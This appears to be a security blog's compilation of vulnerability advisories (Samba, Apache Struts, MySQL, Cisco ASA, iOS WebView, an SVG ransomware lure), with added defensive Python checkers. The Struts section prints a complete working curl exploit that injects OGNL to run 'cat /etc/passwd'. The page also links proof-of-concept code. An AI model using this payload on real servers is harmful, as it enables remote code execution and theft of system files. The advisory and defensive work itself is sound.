CVE-2017-14746: you need to patch your Samba as soon as possible!

A fresh advisory from SAMBA.org:

All versions of Samba from 4.0.0 onwards are vulnerable to a use after
free vulnerability, where a malicious SMB1 request can be used to
control the contents of heap memory via a deallocated heap pointer. It
is possible this may be used to compromise the SMB server.

The major Linux distributions (Red Hat, Ubuntu, Debian) have already rolled out security patches for this vulnerability, tracked as CVE-2017-14746, which affects all versions of Samba since 4.0.

According to the project’s advisory, an unauthenticated attacker could send specially-crafted SMB1 requests to cause the server to crash or execute arbitrary code.

Sysadmins should apply the fixes to their servers; otherwise, the alternative is to turn off SMB1:

==========
Workaround
==========

Prevent SMB1 access to the server by setting the parameter:

server min protocol = SMB2

to the [global] section of your smb.conf and restart smbd. This
prevents any SMB1 access to the server. Note this could cause older
clients to be unable to connect to the server.
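As an added check (not part of the Samba advisory), the following Python parses an smb.conf and reports whether SMB1 can still be negotiated, honouring the "min protocol" synonym and the SMB2/SMB3 aliases from the manual. The sample configurations are constructed, and treating an absent parameter as SMB1-allowed is an assumption matching the 4.x default at the time of the advisory.

```python
import configparser

# Samba protocol levels from lowest to highest, as listed in the smb.conf
# manual; anything below SMB2_02 is an SMB1 dialect.
LEVELS = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",
          "SMB2_02", "SMB2_10", "SMB2_22", "SMB2_24",
          "SMB3_00", "SMB3_02", "SMB3_10", "SMB3_11"]
# The manual maps the bare aliases to these concrete dialects.
ALIASES = {"SMB2": "SMB2_10", "SMB3": "SMB3_11"}


def smb1_allowed(smb_conf_text):
    """Return True if this smb.conf still lets SMB1 clients negotiate.

    Assumption: an absent parameter is treated as allowing SMB1, which
    matches the Samba 4.x default at the time of the advisory.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(smb_conf_text)
    if not parser.has_section("global"):
        return True
    glob = parser["global"]
    # "min protocol" is the documented synonym of "server min protocol".
    value = glob.get("server min protocol") or glob.get("min protocol")
    if not value:
        return True
    level = ALIASES.get(value.strip().upper(), value.strip().upper())
    if level not in LEVELS:
        raise ValueError(f"unknown protocol level in smb.conf: {value!r}")
    return LEVELS.index(level) < LEVELS.index("SMB2_02")


# Constructed sample configurations (not taken from the page).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   server min protocol = NT1
"""
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   server min protocol = SMB2
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: SMB1 allowed = {smb1_allowed(conf)}")
```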

D’oh! Another Apache Struts 2 vulnerability!

Upgrade now, some attacks are already in progress!

Another serious vulnerability was discovered in Apache Struts 2.

Affected versions

Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10

The vulnerability

The vulnerability (CVE-2017-5638), first reported by security researcher Nike Zheng, is a remote code execution bug in the Jakarta Multipart parser of Apache Struts, as described in this security advisory:

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn’t valid an exception is thrown which is then used to display an error message to a user.

The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:

“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.

Technical analyses were released by the major security firms:

Cisco’s Talos

Talos has also released Snort rules that detect exploitation attempts of the vulnerability (rules 41818 and 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.

Talos suggests upgrading ASAP, because the researchers found

“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.

The proof of concept was released by Qualys.

Qualys

Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability

Qualys released a proof of concept that checks for the vulnerability using curl:

For our analysis, we have used the below curl command to replicate the issue:

curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'

It is important to note that the presence of the vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessarily need to implement file upload functionality for this vulnerability to be exploitable.
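As an added example (not code from Qualys, Talos or the Struts project), a defender-side pre-filter in Python: Struts selects the multipart wrapper on the Content-Type header alone, not on whether the action handles uploads, so the check validates that header against the RFC 7231 media-type grammar and separately labels values carrying OGNL markers for alerting. The sample header values are constructed.

```python
import re

# RFC 7230 "token" characters; "{" and "}" are deliberately not among them,
# so an OGNL expression such as %{...} can never be a valid media type.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
# media-type = type "/" subtype *( OWS ";" OWS parameter )
# parameter  = token "=" ( token / quoted-string )
MEDIA_TYPE = re.compile(
    rf"^{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED}))*\s*$"
)
# Substrings seen in OGNL injection attempts; used only to label a hit.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl.", "java.lang.")


def classify_content_type(value):
    """Return 'ok', 'ognl' or 'invalid' for one Content-Type header value."""
    if any(marker in value for marker in OGNL_MARKERS):
        return "ognl"
    return "ok" if MEDIA_TYPE.match(value) else "invalid"


def scan_request_headers(headers):
    """Return a list of findings for a dict of request headers; an empty
    list means the request may be forwarded to the application."""
    findings = []
    for name, value in headers.items():
        if name.lower() == "content-type":
            verdict = classify_content_type(value)
            if verdict != "ok":
                findings.append(f"Content-Type rejected ({verdict}): {value[:40]!r}")
    return findings


# Constructed sample headers; the second carries only an OGNL marker, not a payload.
SAMPLES = [
    {"Host": "app.example", "Content-Type": "multipart/form-data; boundary=----x1"},
    {"Host": "app.example", "Content-Type": "%{(#placeholder='multipart/form-data')}"},
    {"Host": "app.example", "Content-Type": "text html"},
]

if __name__ == "__main__":
    for headers in SAMPLES:
        print(scan_request_headers(headers) or ["forwarded"])
```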

A Python script to check for the vulnerability is also available in the Rapid7 GitHub repository:

https://github.com/rapid7/metasploit-framework/issues/8064

https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325

Remediations?

This vulnerability has been fixed in Struts 2.3.32 and 2.5.10.1, so… upgrade ASAP!

A new infection vector for ransomware: malicious SVG images via Facebook Messenger

The campaign spreads the Nemucod downloader

If you receive a Facebook message with an .SVG image file, just avoid clicking it: a malicious campaign is spreading a ransomware downloader (Nemucod) among Facebook users by taking advantage of an innocent-looking SVG image file to infect computers.

The campaign was discovered by malware researchers Bart Blaze and Peter Kruse, and seems to be an evolution of the threat reported some months ago by AppRiver.

On his blog, Blaze writes:

Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter

Why an SVG file?

Scalable Vector Graphics (SVG) is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation.
This means that this file format has the ability to contain embedded content such as JavaScript, and can be opened in any modern web browser.

In fact, the content of the ‘photo’ (here, the analysis of a sample) is the following:

https://gist.github.com/andreafortuna/d318f2aad20bfcf3d86fdd7e9aaa25e5

an obfuscated JavaScript that starts the download of the payload (the Locky ransomware) and opens a fake YouTube site that asks the user to download and install a browser extension supposedly required to watch the videos:

If the victim installs the Chrome extension, the attack is spread further via Facebook Messenger to all user contacts.
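As an added example (not code from Blaze's analysis), a small Python scanner that a mail or upload gateway could apply to inbound SVG files, flagging the script-capable constructs described above: script elements, on* event-handler attributes and javascript: hrefs. The two SVG samples are constructed and the script body is an inert placeholder.

```python
import xml.etree.ElementTree as ET


def _local(qualified):
    """Strip the "{namespace}" prefix ElementTree puts on qualified names."""
    return qualified.rsplit("}", 1)[-1]


def svg_active_content(svg_bytes):
    """Return a list of findings describing script-capable content in an SVG.

    An empty list means none of the checked constructs is present. For
    untrusted input in production, parse with defusedxml instead of the
    stdlib parser to rule out entity-expansion tricks.
    """
    findings = []
    root = ET.fromstring(svg_bytes)
    for elem in root.iter():
        name = _local(elem.tag)
        if name.lower() == "script":
            body = (elem.text or "").strip()
            findings.append(f"<script> element with {len(body)} bytes of code")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append(f"<{name}> has event handler attribute {aname}")
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"<{name}> href uses the javascript: scheme")
    return findings


# Constructed samples: a harmless drawing and a file mimicking the campaign's
# structure with an inert placeholder script instead of the real downloader.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<circle cx="5" cy="5" r="4"/></svg>')
SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script>/* placeholder */ var x = 1;</script>
  <a xlink:href="javascript:void(0)"><text x="1" y="9">photo</text></a>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, svg_active_content(doc) or "no active content")
```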


I opened the link and installed the extension, how can I fix it?

From Bart Blaze’s post:

Remove the malicious extension from your browser immediately:

Additionally, run a scan with your antivirus and change your Facebook password afterwards.

Notify your friends you sent a malicious file, or in the other case, let your friend know he/she is infected. If you keep receiving the same message from your friend, you may want to temporarily block their messages.


References

https://bartblaze.blogspot.it/2016/11/nemucod-downloader-spreading-via.html

A bug in Apple’s WebView allows an attacker to initiate phone calls without user confirmation

Twitter and LinkedIn iOS apps are vulnerable!

The security researcher Collin Mulliner has discovered an exploitable vulnerability in Apple’s WebView that could allow phone calls to a number of the attacker’s choosing.

iOS WebViews can be used to automatically call an attacker controlled phone number. The attack can block the phone’s UI for a short amount of time and therefore prevent the victim from canceling the call. The bug is an application bug that likely is due to bad OS/framework defaults. One major issue with this vulnerability is that it is really easy to exploit. App developers have to fix their code as soon as possible.

Mulliner said the vulnerability is trivial to exploit, requiring at a minimum one line of HTML code, and that iOS developers who have embedded Apple’s WebView into mobile apps need to be aware.

https://gist.github.com/andreafortuna/50d68e9d109c25bc2cb84abee42463fa

The risks to the user include calls to premium numbers or denial of service against telephone numbers of public services:

About a week ago I read a news post about a guy who got arrested for accidentally DoSing 911 by creating a web page that automatically dialed 911 when it was visited from an iPhone. This was most likely due to a bug with the handling of TEL URI. I immediately thought about a bug I reported to Apple in late October 2008. I couldn’t believe this bug has resurfaced so I investigated. The article said something about posting links on Twitter.

The researcher has also published two video demonstrations of the exploit:



References

https://www.mulliner.org/blog/blosxom.cgi/security/ios_webview_auto_dialer.html

Exploits released for two critical 0-day vulnerabilities in MySQL

These vulnerabilities could be exploited in shared hosting environments to gain access to all databases

Some weeks ago I reported on two critical 0-day vulnerabilities in MySQL (and its forks MariaDB and PerconaDB).

At that time, security researcher Dawid Golunski had published only technical details and proof-of-concept exploit code for the first bug.
Now Golunski has released PoC exploits for both vulnerabilities:

https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

https://gist.github.com/andreafortuna/1bdc25021089be5344047b7ded433fc8

One is the previously promised critical privilege escalation vulnerability (CVE-2016-6663), which can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate its privileges and execute arbitrary code as the database system user.

The other is a new root privilege escalation bug (CVE-2016-6664) that could allow attackers with ‘MySQL system user’ privileges to further escalate to the root user, fully compromising the system.

Both the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier.


Patches and Mitigations

MySQL has already fixed the vulnerabilities and you are strongly advised to apply patches as soon as possible.

If you are unable to apply the patches immediately, you can apply a temporary mitigation by disabling symbolic link support in your database server configuration with this setting in my.cnf:

symbolic-links = 0

CVE-2016-6662: a critical MySQL Zero-Day

Oracle, are you there? We need you!

Dawid Golunski, a Polish security researcher, discovered several security issues in the MySQL DBMS, including a flaw (CVE-2016-6662) that can be exploited by a remote attacker to inject malicious settings into my.cnf configuration files.

The vulnerability affects all currently supported MySQL versions as well as MariaDB and PerconaDB.

The vulnerability can be exploited via an SQL injection attack, or by an attacker with valid credentials, either locally or over the web via phpMyAdmin:

“A successful exploitation could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running”

Golunski has also published proof-of-concept exploit code:

https://gist.github.com/andreafortuna/7c6e6d8aa936ef459fdbd9298b77452e

More technical information is in the official advisory.

Patching?

From Golunski’s advisory:

The vulnerability was reported to Oracle on 29th of July 2016 and triaged
by the security team.
It was also reported to the other affected vendors including PerconaDB and MariaDB.

The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of
30th of August.
During the course of the patching by these vendors the patches went into
public repositories and the fixed security issues were also mentioned in the
new releases which could be noticed by malicious attackers.

As over 40 days have passed since reporting the issues and patches were already
mentioned publicly, a decision was made to start disclosing vulnerabilities
(with limited PoC) to inform users about the risks before the vendor's next 
CPU update that only happens at the end of October.

No official patches or mitigations are available at this time from the vendor. 
As temporary mitigations, users should ensure that no mysql config files are
owned by mysql user, and create root-owned dummy my.cnf files that are not in 
use.
These are by no means a complete solution and users should apply official vendor
patches as soon as they become available.
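Both mitigations quoted on this page, the symbolic-links = 0 setting from the CVE-2016-6663/6664 post and the file-ownership advice from the CVE-2016-6662 advisory above, can be verified with the following added Python (not Golunski's code). The default config paths are the standard Linux locations from the MySQL manual; !include directives are skipped rather than followed, which is a simplification, and the self-check treats the current uid as if it were the mysql uid.

```python
import configparser
import os
import tempfile

# Standard Linux locations mysqld reads, in order (MySQL manual); ~/.my.cnf
# is omitted because it is per user.
DEFAULT_CONFIG_PATHS = ["/etc/my.cnf", "/etc/mysql/my.cnf", "/usr/etc/my.cnf"]

def symlinks_disabled(my_cnf_text):
    """True if [mysqld] turns symbolic link support off, via "symbolic-links =
    0/OFF/FALSE" or the bare "skip-symbolic-links" form ('-' or '_' spelling);
    "!include" lines are skipped rather than followed."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       allow_no_value=True,
                                       comment_prefixes=("#", ";", "!"))
    parser.read_string(my_cnf_text)
    if not parser.has_section("mysqld"):
        return False
    sect = parser["mysqld"]
    if "skip-symbolic-links" in sect or "skip_symbolic_links" in sect:
        return True
    for key in ("symbolic-links", "symbolic_links"):
        value = sect.get(key)
        if value is not None:
            return value.strip().upper() in ("0", "OFF", "FALSE")
    return False

def audit_config_ownership(paths, mysql_uid):
    """Flag config files owned by the mysql uid (writable if that account is
    compromised) and missing ones that could be pre-created root-owned."""
    findings = []
    for path in paths:
        try:
            owner = os.stat(path).st_uid
        except FileNotFoundError:
            findings.append((path, "missing: consider a root-owned dummy file"))
            continue
        if owner == mysql_uid:
            findings.append((path, "owned by the mysql user"))
    return findings

def self_check():
    """Audit a throwaway file, pretending the current uid is the mysql uid."""
    with tempfile.NamedTemporaryFile() as tmp:
        return audit_config_ownership([tmp.name, tmp.name + ".absent"], os.getuid())

if __name__ == "__main__":
    print(symlinks_disabled("[mysqld]\nsymbolic-links = 0\n"))
    print(self_check())
```

On a real host, call audit_config_ownership(DEFAULT_CONFIG_PATHS, pwd.getpwnam("mysql").pw_uid) and feed each existing file's contents to symlinks_disabled.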

References

http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

CVE-2016-1287: Cisco ASA Software IKEv1 / IKEv2 Buffer Overflow, proof of concept released

Exodus Intelligence have released the proof of concept code on their GitHub page

On February 10, 2016, a vulnerability related to the Internet Key Exchange (IKE) protocol implementation of Cisco devices (CVE-2016-1287) was officially disclosed.

Yesterday, the researchers who found this bug, Exodus Intel, have released the proof of concept code on their GitHub page.


Affected Products

  • Cisco ASA 5500 Series Adaptive Security Appliances
  • Cisco ASA 5500-X Series Next-Generation Firewalls
  • Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • Cisco ASA 1000V Cloud Firewall
  • Cisco Adaptive Security Virtual Appliance (ASAv)
  • Cisco Firepower 9300 ASA Security Module
  • Cisco ISA 3000 Industrial Security Appliance

Cisco has already released software updates that address the vulnerability.


The POC

https://gist.github.com/andreafortuna/657ed351b1231bfa43ffe8a603c3fb95


Links and resources